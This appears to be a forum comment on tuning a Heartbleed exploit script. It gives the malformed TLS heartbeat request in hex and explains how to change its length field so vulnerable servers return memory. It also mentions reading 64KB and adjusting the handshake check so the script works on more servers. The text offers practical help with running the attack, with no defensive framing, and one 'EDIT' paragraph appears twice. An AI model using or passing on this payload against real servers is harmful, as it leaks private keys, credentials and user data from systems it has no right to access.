Thanks for the information. I modified the script to request a different number of bytes. It seems that 16384 is too much and causes the server to abort sending, but lower amounts work to successfully dump memory.
EDIT: The other thing is that it seems better to check for "Server Hello Done" at the end of the handshake message as some servers seem to send all submessages within one handshake message (though not sure if they're OpenSSL-based), i.e. look for ord(pay[-4]) == 0x0E rather than at ord(pay[0]).
For those that don't python and/or don't know where to edit.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
See that "40 00" there? That's hex and 0x4000 = 16384. Change it to something like "02 00", so it's 0x200 = 512, or 0x400 = 1024 ...or whatever you want.(But keep it at a power of 2... I assume).
As long as it's valid hex it should be fine, there seems to be a lower bound at which point servers don't respond but I didn't play around for too long with that part.
Most articles also mention 64kb which the script can do with some small modifications.
EDIT: The other thing is that it seems better to check for "Server Hello Done" at the end of the handshake message as some servers seem to send all submessages within one handshake message (though not sure if they're OpenSSL-based), i.e. look for ord(pay[-4]) == 0x0E rather than at ord(pay[0]).